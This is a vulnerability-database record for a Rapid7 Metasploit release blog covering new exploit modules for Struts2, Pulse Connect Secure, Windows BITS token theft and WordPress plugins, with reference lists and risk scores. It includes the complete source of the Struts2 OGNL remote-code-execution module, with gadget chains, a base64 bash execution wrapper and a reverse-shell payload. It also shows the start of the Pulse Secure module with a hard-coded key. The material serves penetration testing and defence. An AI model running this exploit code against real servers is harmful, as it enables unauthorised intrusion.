DATABASE RESOURCES PRICING ABOUT US

{"id": "RAPID7BLOG:5482AC1594C82A230828023816657B57", "type": "rapid7blog", "bulletinFamily": "info", "title": "Metasploit Wrap-Up", "description": "## Struts2 Multi Eval OGNL RCE\n\n\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) added [`exploit/multi/http/struts2_multi_eval_ognl`](<https://github.com/rapid7/metasploit-framework/pull/14521>), which exploits Struts2 evaluating OGNL expressions in HTML attributes multiple times ([CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>) and [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>)). The [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>) OGNL chain for remote code execution requires a one-time chain to enable the RCE gadget, which is handled automatically by the module. The OGNL gadget chain for [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>) will echo the command output. Both chains use a simple mathematical expression to ensure that evaluation occurs. These vulnerabilities are application dependent, and the user does need to know which CVE they are targeting. Setting the `NAME` parameter appropriately and using the check method to ensure evaluation takes place inside an HTML attribute are key to successful exploitation.\n\n## JuicyPotato-like Windows privilege escalation exploit\n\nExploit module [`exploits/windows/local/bits_ntlm_token_impersonation`](<https://github.com/rapid7/metasploit-framework/pull/14046>) was added by Metasploit contributor [C4ssandre](<https://github.com/C4ssandre>). It exploits BITS connecting to a local Windows Remote Management server (WinRM) at startup time. A fake WinRM server listening on port `5985` is started by a `DLL` loaded from a previous unprivileged meterpreter session. The fake server triggers BITS and then steals a `SYSTEM` token from the subsequent authentication request. The token is then used to start a new process and launch `powershell.exe` as the `SYSTEM` user. It downloads a malicious PowerShell script and executes it on a second local HTTP server, not writing any files to disk. The exploit is based on [decoder's PoC](<https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/>). It has been successfully tested on Windows 10 (10.0 Build 19041) 32 bits.\n\n## Pulse Connect Secure Gzip RCE\n\nMetasploit contributor [h00die](<https://github.com/h00die>) added an [exploit](<https://github.com/rapid7/metasploit-framework/pull/14368>) that targets Pulse Connect Secure server version `9.1R8` and earlier. The vulnerability was originally discovered by the [NCC Group](<https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/>). It achieves authenticated remote code execution as `root` by uploading an encrypted config that contains an overwrite for a Perl template file. This module was made possible by [rxwx](<https://github.com/rxrx>), who shared the encryption code with the author. Admin credentials are required for successful `root` access. The module has been tested against server version `9.1R8`.\n\n## New modules (8)\n\n * [SpamTitan Unauthenticated RCE](<https://github.com/rapid7/metasploit-framework/pull/14330>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and [Felipe Molina](<https://github.com/felmoltor>), which exploits [CVE-2020-11698](<https://attackerkb.com/topics/ZM17ZOD4ym/cve-2020-11698?referrer=blog>)\n * [Pulse Secure VPN gzip RCE](<https://github.com/rapid7/metasploit-framework/pull/14368>) by [David Cash](<https://research.nccgroup.com/author/dcashncc/>), [Richard Warren](<https://uk.linkedin.com/in/rich-warren-437a7841>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [h00die](<https://github.com/h00die>), which exploits [CVE-2020-8260](<https://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=blog>)\n * [Apache Struts 2 Forced Multi OGNL Evaluation](<https://github.com/rapid7/metasploit-framework/pull/14521>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), Matthias Kaiser, [Spencer McIntyre](<https://github.com/zeroSteiner>), and [ka1n4t](<https://github.com/ka1n4t>), which exploits [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>) and [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>)\n * [SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.](<https://github.com/rapid7/metasploit-framework/pull/14046>) by Andrea Pierini ([decoder](<https://github.com/decoder>)), Antonio Cocomazzi (splinter_code), [Cassandre](<https://github.com/C4ssandre>), and Roberto ([0xea31](<https://github.com/0xea31>))\n * [Shodan Host Port](<https://github.com/rapid7/metasploit-framework/pull/14429>) by [natto97](<https://github.com/natto97>)\n * [WordPress Duplicator File Read Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/14497>) by Hoa Nguyen - SunCSR Team and Ramuel Gall, which exploits [CVE-2020-11738](<https://attackerkb.com/topics/judia21wRt/cve-2020-11738?referrer=blog>)\n * [WordPress Easy WP SMTP Password Reset](<https://github.com/rapid7/metasploit-framework/pull/14474>) by [h00die](<https://github.com/h00die>), which exploits [CVE-2020-35234](<https://attackerkb.com/topics/12eb7VUXHR/cve-2020-35234?referrer=blog>)\n * [WordPress Total Upkeep Unauthenticated Backup Downloader](<https://github.com/rapid7/metasploit-framework/pull/14568>) by Wadeek and [h00die](<https://github.com/h00die>)\n\n## Enhancements and features\n\n * PR [14566](<https://github.com/rapid7/metasploit-framework/pull/14566>) from [zeroSteiner](<https://github.com/zeroSteiner>) Module `auxiliary/server/socks_proxy` replaces `modules/auxiliary/server/socks4a.rb` and `modules/auxiliary/server/socks5.rb`.\n * PR [14538](<https://github.com/rapid7/metasploit-framework/pull/14538>) from [jmartin-r7](<https://github.com/jmartin-r7>) Improves Metasploit's XML importer error messages when data is not Base64 encoded.\n * PR [14528](<https://github.com/rapid7/metasploit-framework/pull/14528>) from [zeroSteiner](<https://github.com/zeroSteiner>) Clarifies Windows Meterpreter payloads description support of XP SP2 or newer.\n * PR [14522](<https://github.com/rapid7/metasploit-framework/pull/14522>) from [axxop](<https://github.com/axxop>) Replaces the hardcoded default Shiro encryption key with a new datastore option that allows users to specify rememberMe cookie encryption key.\n * PR [14517](<https://github.com/rapid7/metasploit-framework/pull/14517>) from [timwr](<https://github.com/timwr>) Changes the osx/x64/shell_reverse_tcp payload to be generated with Metasm and captures and sends STDERR to msfconsole.\n * PR [14509](<https://github.com/rapid7/metasploit-framework/pull/14509>) from [egypt](<https://github.com/egypt>) This adds a Java target to the Apache Solr RCE exploit module and fixes several payload issues.\n * PR [14444](<https://github.com/rapid7/metasploit-framework/pull/14444>) from [dwelch-r7](<https://github.com/dwelch-r7>) Adds a couple of missing methods from the remote data services for adding and deleting routes.\n\n## Bugs fixed\n\n * PR [14589](<https://github.com/rapid7/metasploit-framework/pull/14589>) from [timwr](<https://github.com/timwr>) Fixes a file download issue with the Android Meterpreter's download command.\n * PR [14532](<https://github.com/rapid7/metasploit-framework/pull/14532>) from [bcoles](<https://github.com/bcoles>) Fixes a NoMethodError exception caused by the Msf::Post::Common mixin not being included in post/android/capture/screen.\n * PR [14530](<https://github.com/rapid7/metasploit-framework/pull/14530>) from [jmartin-r7](<https://github.com/jmartin-r7>) Fixes a failing test on macOS caused by IPv6 vs IPv4 result precedence.\n * PR [14475](<https://github.com/rapid7/metasploit-framework/pull/14475>) from [dwelch-r7](<https://github.com/dwelch-r7>) Fixes the EICAR canary check.\n * PR [14334](<https://github.com/rapid7/metasploit-framework/pull/14334>) from [Summus-git](<https://github.com/Summus-git>) Fixes a x86 linux bind shell payloads socket closing bug.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.22...6.0.25](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-12-17T10%3A49%3A21-06%3A00..2021-01-07T10%3A58%3A16%2B00%3A00%22>)\n * [Full diff 6.0.22...6.0.25](<https://github.com/rapid7/metasploit-framework/compare/6.0.22...6.0.25>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "published": "2021-01-08T19:54:36", "modified": "2021-01-08T19:54:36", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://blog.rapid7.com/2021/01/08/metasploit-wrap-up-93/", "reporter": "Sonny Gonzalez", "references": [], "cvelist": ["CVE-2019-0230", "CVE-2020-11698", "CVE-2020-11738", "CVE-2020-17530", "CVE-2020-35234", "CVE-2020-8260"], "lastseen": "2021-01-08T22:48:37", "viewCount": 345, "enchantments": {"dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-60189", "ATLASSIAN:CONFSERVER-60264", "ATLASSIAN:CWD-5688", "CONFSERVER-60264", "CWD-5688"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:7B975634-2048-4113-92B7-D2E74D1CEE74", "AKB:A93881E2-CFB7-49E3-81CF-664913BEA12E", "AKB:CB02764B-566F-4540-ACA2-C9DDEE8D1496", "AKB:CF76EF1F-CB59-4A29-ADB1-DA37C695142B", "AKB:EADBBBBE-8A57-469F-A96F-22A14761BCF0", "AKB:EE68C1DD-4843-420D-B126-5C0A7277EFD4"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1331"]}, {"type": "cisa", "idList": ["CISA:3D9E69A26C68866B64ED6E4B31E270E6", "CISA:C17258C519A149D638B0BCF35898ABEE"]}, {"type": "cve", "idList": ["CVE-2019-0230", "CVE-2020-11698", "CVE-2020-11738", "CVE-2020-17530", "CVE-2020-35234", "CVE-2020-8260", "CVE-2021-31805"]}, {"type": "dsquare", "idList": ["E-724"]}, {"type": "exploitdb", "idList": ["EDB-ID:48856", "EDB-ID:49068", "EDB-ID:50420"]}, {"type": "f5", "idList": ["F5:K24608264"]}, {"type": "github", "idList": ["GHSA-JC35-Q369-45PV", "GHSA-V8J6-6C2R-R27C", "GHSA-WP4H-PVGW-5727"]}, {"type": "githubexploit", "idList": ["2691C74B-4ECB-5E22-8BDF-7784E321BE55", "32FB08A0-ACB0-5E2F-8691-570E7B806086", "3640EAF9-330F-508E-A488-D3A51649AD96", "453574C2-C801-529D-A0A6-5C5E1471F1AC", "4E339DB6-4704-5991-B690-DF8D7307532E", "5E7409E5-7716-5F40-999C-E6622B806F5E", "7247E67F-6DD7-5526-8312-91D0D99FED26", "B1E738E0-BF1B-50E1-88E2-1D265CF9AEB8", "B2E1F725-D74D-5E81-88CC-6530BC9BAB30", "BC46DAAE-9274-500B-A6A2-DB7DA8EAF068", "BD05B538-25EA-5C42-AE8D-229D78B57CB1", "C878132C-FB46-5C51-9D3B-B87DB3578112", "EF22B1BD-85C3-525C-B7D6-94014939E96B"]}, {"type": "hackerone", "idList": ["H1:1021010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200902-01-STRUTS2"]}, {"type": "ibm", "idList": ["20DAAA2A40C4A633F7230B8255F0CADBA6E88A77DD305EC21132BECBFF011089", "2728A54A733C1334AD5FF98B90433841FD176869AA41A20F157E87B17EAD4D49", "3477DD0939B4B8CC59240F8DCC09305A2F7C13CA45285602F1755CDF6F593B52", "35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD", "3FA2879FBADE8540F6B4D5091DA5772A30EB11207B58722F47A672ABFF7C289C", "456B2EB80A04726EA1ABA567940D381A0E2976991206F33CA962674055ED3FD9", "461BBFF276D2BD07EE935B18691B56E01933360B1B42DAE8AAFFC1167BCA5486", "47A9526430C9C366FECCD6852CFBC71095166B7357B960378A8A4EBF55B1FBCC", "60BC7D4DCC3D358CA3A091D2D1C15EE5A67539C2664E72739BD35D6406A88E4A", "6AB7EE25CEFEC99E5658BEFE4D594FAAA375C1558F00A1900E6FF8619C6CA80A", "9235ED396A90BB944C2B22072DE6B91B22155C3982DDD732067344CA700C0ADE", "BE38ED822E7AF0C00178B9F33546DB67627005E6481750CB7374811E7F5674AE", "C22DE952FD6E1544B14AE2735F81ACAE3EF08509FC895F0AAF0AC7485A98F798", "C6AE70E5471CDF678253E267AB7C45FA772A777F24502EE50E243BD88E300D13", "D7F5135F5917DEC79A3EC5F40696F566955841FB3632FC8C822946EC528790B3", "DE610DDFE9494156D25DDA58CDDC5C5009E3BBAAB1D9C6FC73CE6056DFE0DCFA", "E3347BCB529A35601F044748C20F62BDDA272E18F4F99AF1DC1EC2079BD36858"]}, {"type": "jvn", "idList": ["JVN:43969166"]}, {"type": "kitploit", "idList": ["KITPLOIT:5420210148456420402"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-HTTP-PULSE_SECURE_GZIP_RCE-", "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_MULTI_EVAL_OGNL-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B"]}, {"type": "nessus", "idList": ["MYSQL_ENTERPRISE_MONITOR_8_0_24.NASL", "PULSE_CONNECT_SECURE-SA44601.NASL", "PULSE_POLICY_SECURE-SA44601.NASL", "STRUTS_2_5_22.NASL", "STRUTS_2_5_26.NASL", "STRUTS_CVE_2020_17530.NBIN", "STRUTS_S2-061.NASL", "STRUTS_S2-062.NASL", "WEB_APPLICATION_SCANNING_112765", "WEB_APPLICATION_SCANNING_112766", "WEB_APPLICATION_SCANNING_113226", "WEB_APPLICATION_SCANNING_98941", "WORDPRESS_PLUGIN_DUPLICATOR_1_3_28.NASL", "WORDPRESS_PLUGIN_DUPLICATOR_CVE-2020-11738.NBIN"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021", "ORACLE:CPUAPR2022", "ORACLE:CPUJAN2021", "ORACLE:CPUJAN2022", "ORACLE:CPUJUL2021", "ORACLE:CPUOCT2021"]}, {"type": "osv", "idList": ["OSV:GHSA-JC35-Q369-45PV", "OSV:GHSA-V8J6-6C2R-R27C", "OSV:GHSA-WP4H-PVGW-5727"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159470", "PACKETSTORM:160108", "PACKETSTORM:160619", "PACKETSTORM:160621", "PACKETSTORM:160721", "PACKETSTORM:160809", "PACKETSTORM:164533"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:FE0BAF7268104D525CC0A2ABC0471C4C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-0230", "RH:CVE-2020-17530", "RH:CVE-2021-31805"]}, {"type": "saint", "idList": ["SAINT:1126B0AA9A8BD987E404F1746F1D8BFA", "SAINT:61E99B83D8C03F67350245D1B8BDC99C", "SAINT:891A42933A0DE986694E3B7D51B3F2F1", "SAINT:AE1DA80E6B0E4C12B5D781794166897B", "SAINT:D1B88155F516D415CE4F67A190458DDB"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA", "THN:9FB8DE3BF545932321335F2C525A4A36", "THN:AE2E46F59043F97BE70DB77C163186E6"]}, {"type": "threatpost", "idList": ["THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-0230", "UB:CVE-2020-17530", "UB:CVE-2021-31805"]}, {"type": "veracode", "idList": ["VERACODE:26331", "VERACODE:28516", "VERACODE:35070"]}, {"type": "wpexploit", "idList": ["WPEX-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:14EADE63-E365-4BFC-A30E-9E2A7E739049", "WPVDB-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D"]}, {"type": "zdt", "idList": ["1337DAY-ID-35263", "1337DAY-ID-35525", "1337DAY-ID-35571", "1337DAY-ID-36914"]}]}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-60189"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:7B975634-2048-4113-92B7-D2E74D1CEE74", "AKB:CF76EF1F-CB59-4A29-ADB1-DA37C695142B", "AKB:EADBBBBE-8A57-469F-A96F-22A14761BCF0"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1331"]}, {"type": "cisa", "idList": ["CISA:3D9E69A26C68866B64ED6E4B31E270E6", "CISA:C17258C519A149D638B0BCF35898ABEE"]}, {"type": "cve", "idList": ["CVE-2020-11738", "CVE-2020-17530", "CVE-2020-35234"]}, {"type": "dsquare", "idList": ["E-724"]}, {"type": "exploitdb", "idList": ["EDB-ID:48856", "EDB-ID:49068"]}, {"type": "f5", "idList": ["F5:K24608264"]}, {"type": "github", "idList": ["GHSA-WP4H-PVGW-5727"]}, {"type": "githubexploit", "idList": ["2691C74B-4ECB-5E22-8BDF-7784E321BE55", "32FB08A0-ACB0-5E2F-8691-570E7B806086", "3640EAF9-330F-508E-A488-D3A51649AD96", "453574C2-C801-529D-A0A6-5C5E1471F1AC", "4E339DB6-4704-5991-B690-DF8D7307532E", "5E7409E5-7716-5F40-999C-E6622B806F5E", "7247E67F-6DD7-5526-8312-91D0D99FED26", "B1E738E0-BF1B-50E1-88E2-1D265CF9AEB8", "B2E1F725-D74D-5E81-88CC-6530BC9BAB30", "BC46DAAE-9274-500B-A6A2-DB7DA8EAF068", "BD05B538-25EA-5C42-AE8D-229D78B57CB1", "C878132C-FB46-5C51-9D3B-B87DB3578112", "EF22B1BD-85C3-525C-B7D6-94014939E96B"]}, {"type": "hackerone", "idList": ["H1:1021010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200902-01-STRUTS2"]}, {"type": "ibm", "idList": ["2728A54A733C1334AD5FF98B90433841FD176869AA41A20F157E87B17EAD4D49", "E3347BCB529A35601F044748C20F62BDDA272E18F4F99AF1DC1EC2079BD36858"]}, {"type": "jvn", "idList": ["JVN:43969166"]}, {"type": "kitploit", "idList": ["KITPLOIT:5420210148456420402"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C"]}, {"type": "nessus", "idList": ["MYSQL_ENTERPRISE_MONITOR_8_0_24.NASL", "STRUTS_2_5_22.NASL", "STRUTS_2_5_26.NASL", "WORDPRESS_PLUGIN_DUPLICATOR_1_3_28.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2021"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159470", "PACKETSTORM:160108", "PACKETSTORM:160619", "PACKETSTORM:160621"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:FE0BAF7268104D525CC0A2ABC0471C4C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-17530"]}, {"type": "saint", "idList": ["SAINT:1126B0AA9A8BD987E404F1746F1D8BFA", "SAINT:AE1DA80E6B0E4C12B5D781794166897B"]}, {"type": "thn", "idList": ["THN:AE2E46F59043F97BE70DB77C163186E6"]}, {"type": "threatpost", "idList": ["THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-0230"]}, {"type": "wpexploit", "idList": ["WPEX-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:14EADE63-E365-4BFC-A30E-9E2A7E739049", "WPVDB-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D"]}, {"type": "zdt", "idList": ["1337DAY-ID-35263", "1337DAY-ID-35525", "1337DAY-ID-35571"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-0230", "epss": "0.856390000", "percentile": "0.979350000", "modified": "2023-03-16"}, {"cve": "CVE-2020-11698", "epss": "0.726990000", "percentile": "0.974910000", "modified": "2023-03-16"}, {"cve": "CVE-2020-11738", "epss": "0.972900000", "percentile": "0.997250000", "modified": "2023-03-16"}, {"cve": "CVE-2020-17530", "epss": "0.968010000", "percentile": "0.994250000", "modified": "2023-03-16"}, {"cve": "CVE-2020-35234", "epss": "0.537170000", "percentile": "0.970270000", "modified": "2023-03-16"}, {"cve": "CVE-2020-8260", "epss": "0.006580000", "percentile": "0.763870000", "modified": "2023-03-16"}], "vulnersScore": -0.2}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659988328, "score": 1684007085, "epss": 1679062491}, "_internal": {"score_hash": "a68561932337f618d06be97870288e94"}}

{"metasploit": [{"lastseen": "2022-11-03T06:46:29", "description": "The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). This vulnerability is application dependant. A server side template must make an affected use of request data to render an HTML tag attribute.\n", "cvss3": {}, "published": "2020-12-16T00:17:35", "type": "metasploit", "title": "Apache Struts 2 Forced Multi OGNL Evaluation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_MULTI_EVAL_OGNL-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/struts2_multi_eval_ognl/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache Struts 2 Forced Multi OGNL Evaluation',\n 'Description' => %q{\n The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags\n attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a\n tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).\n\n This vulnerability is application dependant. A server side template must make an affected use of request data to\n render an HTML tag attribute.\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Matthias Kaiser', # discovery of CVE-2019-0230\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2020-17530\n 'ka1n4t', # PoC of CVE-2020-17530\n ],\n 'References' => [\n ['CVE', '2019-0230'],\n ['CVE', '2020-17530'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'],\n ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'],\n ['URL', 'https://github.com/ka1n4t/CVE-2020-17530'],\n ],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ]\n },\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\n OptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']),\n OptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-17530', ['CVE-2020-17530', 'CVE-2019-0230']])\n ])\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\n OptString.new('HttpCookie', [false, 'An optional cookie to include when making the HTTP request'])\n ])\n end\n\n def check\n num1 = rand(1000..9999)\n num2 = rand(1000..9999)\n\n res = send_request_cgi(build_http_request(datastore['CVE'], \"#{num1}*#{num2}\"))\n if res.nil?\n return CheckCode::Unknown\n elsif res.body.scan(/([\"'])\\s*#{(num1 * num2)}\\s*\\1/).empty?\n return CheckCode::Safe\n end\n\n return CheckCode::Appears\n end\n\n def exploit\n cve = datastore['CVE']\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']} using #{cve}\")\n\n if cve == 'CVE-2019-0230'\n ognl = []\n ognl << '#context=#attr[\\'struts.valueStack\\'].context'\n ognl << '#container=#context[\\'com.opensymphony.xwork2.ActionContext.container\\']'\n ognl << '#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)'\n ognl << '#ognlUtil.setExcludedClasses(\\'\\')'\n ognl << '#ognlUtil.setExcludedPackageNames(\\'\\')'\n res = send_request_cgi(build_http_request(cve, ognl))\n fail_with(Failure::UnexpectedReply, 'Failed to execute the OGNL preamble') unless res&.code == 200\n end\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded, { cve: cve })\n when :linux_dropper\n execute_cmdstager({ cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512 })\n end\n end\n\n def execute_command(cmd, opts = {})\n send_request_cgi(build_http_request(opts[:cve], build_ognl(opts[:cve], cmd)), 5)\n end\n\n def build_http_request(cve, ognl)\n ognl = ognl.map { |part| \"(#{part})\" }.join('.') if ognl.is_a? Array\n\n http_request_parameters = { 'uri' => normalize_uri(target_uri.path) }\n http_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank?\n if cve == 'CVE-2019-0230'\n http_request_parameters['method'] = 'GET'\n http_request_parameters['vars_get'] = { datastore['NAME'] => \"%{#{ognl}}\" }\n elsif cve == 'CVE-2020-17530'\n http_request_parameters['method'] = 'POST'\n http_request_parameters['vars_post'] = { datastore['NAME'] => \"%{#{ognl}}\" }\n end\n http_request_parameters\n end\n\n def build_ognl(cve, cmd)\n cmd = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\"\n ognl = []\n if cve == 'CVE-2019-0230'\n ognl << '#context=#attr[\\'struts.valueStack\\'].context'\n ognl << '#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)'\n ognl << \"@java.lang.Runtime@getRuntime().exec(\\\"#{cmd}\\\")\"\n elsif cve == 'CVE-2020-17530'\n ognl << '#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]'\n ognl << '#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]'\n ognl << '#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")'\n ognl << '#bean.setBean(#stack)'\n ognl << '#context=#bean.get(\"context\")'\n ognl << '#bean.setBean(#context)'\n ognl << '#macc=#bean.get(\"memberAccess\")'\n ognl << '#bean.setBean(#macc)'\n ognl << '#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")'\n ognl << '#bean.put(\"excludedClasses\",#emptyset)'\n ognl << '#bean.put(\"excludedPackageNames\",#emptyset)'\n ognl << '#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")'\n ognl << \"#execute.exec({\\\"#{cmd}\\\"})\"\n end\n\n ognl\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_multi_eval_ognl.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-03T19:06:09", "description": "The Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability which allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root. Admin credentials are required for successful exploitation. Of note, MANY binaries are not in `$PATH`, but are located in `/home/bin/`.\n", "cvss3": {}, "published": "2020-12-07T15:54:20", "type": "metasploit", "title": "Pulse Secure VPN gzip RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8260"], "modified": "2021-04-12T23:50:31", "id": "MSF:EXPLOIT-LINUX-HTTP-PULSE_SECURE_GZIP_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/pulse_secure_gzip_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n ENCRYPTION_KEY = \"\\x7e\\x95\\x42\\x1a\\x6b\\x88\\x66\\x41\\x43\\x1b\\x32\\xc5\\x24\\x42\\xe2\\xe4\\x83\\xf8\\x1f\\x58\\xb0\\xe9\\xe9\\xa5\".b\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Pulse Secure VPN gzip RCE',\n 'Description' => %q{\n The Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability\n which allows an attacker to overwrite arbitrary files, 